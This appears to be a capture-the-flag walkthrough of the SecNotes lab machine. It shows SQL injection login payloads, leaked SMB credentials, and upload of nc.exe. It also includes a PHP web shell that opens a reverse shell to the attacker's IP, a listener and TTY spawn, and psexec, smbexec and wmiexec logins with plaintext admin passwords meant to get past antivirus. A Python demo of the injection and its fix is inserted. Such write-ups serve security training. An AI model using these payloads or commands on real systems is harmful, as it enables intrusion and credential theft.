Windows Subsystem for Linux

SecNotes Machine

Sign up to see the regular user page

Try XSS, SQL injection, etc. wherever there is a page with input

Sign in with:

'OR 1 OR'

Register user as:

'OR 1 OR'

Login as the injection user

Page output:

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

NOTE: a \\server\share path like this is probably an SMB share
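As an added example (not from the original notes, and not the real application's code), the following Python/sqlite3 script models the second-order injection used above: registration stores the payload username verbatim, and a notes query that concatenates the stored username returns every user's notes, while the parameterized query returns only the payload user's own note. The table layout and sample rows are constructed assumptions.

```python
import sqlite3

PAYLOAD = "' OR 1 OR '"  # the page's payload, with spaces added for readability


def build_db():
    """Constructed in-memory stand-in for the site's database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE notes (username TEXT, title TEXT, body TEXT);
        INSERT INTO users VALUES ('tyler', 'placeholder');
        INSERT INTO notes VALUES ('tyler', 'new-site', 'share path and creds (constructed)');
        INSERT INTO notes VALUES ('alice', 'todo', 'constructed sample note');
    """)
    return conn


def register(conn, username, password):
    # Registration is parameterized, so the payload is stored verbatim; the
    # injection only fires later, when the stored username is reused unsafely.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))
    conn.execute("INSERT INTO notes VALUES (?, ?, ?)", (username, "welcome", "first note"))


def notes_vulnerable(conn, username):
    # Vulnerable: the stored username is concatenated into the WHERE clause, so
    # "' OR 1 OR '" becomes  WHERE username = '' OR 1 OR ''  (always true).
    sql = "SELECT username, title FROM notes WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def notes_fixed(conn, username):
    # Mitigation: bind the value as a parameter; the payload is matched literally.
    sql = "SELECT username, title FROM notes WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo():
    """Returns (rows from vulnerable query, rows from fixed query) for the payload user."""
    conn = build_db()
    register(conn, PAYLOAD, "anything")
    return notes_vulnerable(conn, PAYLOAD), notes_fixed(conn, PAYLOAD)


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable query returned", len(vuln), "rows:", vuln)
    print("parameterized query returned", len(fixed), "rows:", fixed)
```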

New login!

PSExec?

psexec.py tyler:'92g!mA8BGjOirkL%OG*&'@10.10.10.97

ADMIN$ and C$ are not writable

found a writable share but cannot run the exploit

does not connect!

explore the new site:

smbclient \\\\10.10.10.97\\new-site -U tyler
92g!mA8BGjOirkL%OG*&

we get in!

ls

to see what’s on it

Windows Server (IIS) on port 8808

Navigate to:

10.10.10.97:8808

Can we upload a file to gain shell?

spoiler: NO, something deletes uploaded files very quickly, either antivirus or a script that deletes anything that isn't one of the default files supposed to be there

What if we use NetCat?

find the NetCat path in a new tab:

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe nc.exe

Go back to SMB and:

put nc.exe

we uploaded nc.exe to the server

make a malicious PHP file:

<?php
system('nc.exe -e cmd.exe 10.10.14.3 4444');
?>

(10.10.14.3 is the Kali IP used)

open a listener:

nc -nvlp 4444

garbage that doesn’t really work (assume it does for the exam)

once you get on the network:

whoami
systeminfo
sc query windefend    (checks whether Windows Defender is running; cmd.exe has no # comments, so don't paste that part)

NOTE:

To find where bash and WSL are:

where /R c:\windows bash.exe
where /R c:\windows wsl.exe

To run WSL with a command:

copy the path it gave you, then append a space and the command to run, e.g.:
<path to wsl.exe> whoami

Run bash:

copy and paste the path and hit enter to open a bash shell
whoami
hostname
uname -a  # tells you what part of the system you're on; right now this is the Linux subsystem

To get a TTY shell:

python -c "import pty;pty.spawn('/bin/bash')"

resource for the TTY shell:

https://netsec.ws/?p=337

Current folder in the Linux subsystem:

pwd
ls -la
history
sudo -l  # lists sudo privileges, if sudo runs at all

History will usually give you easy quick wins, like a plaintext password for admin/sudo

With that info, you can:

If using psexec.py:

psexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97

the output shows

Found writable share ADMIN$

but it gets stuck at starting the service. This means antivirus is blocking us (again), so we can try the other exec scripts to see if they get through the antivirus

You can try:

smbexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97
OR
wmiexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97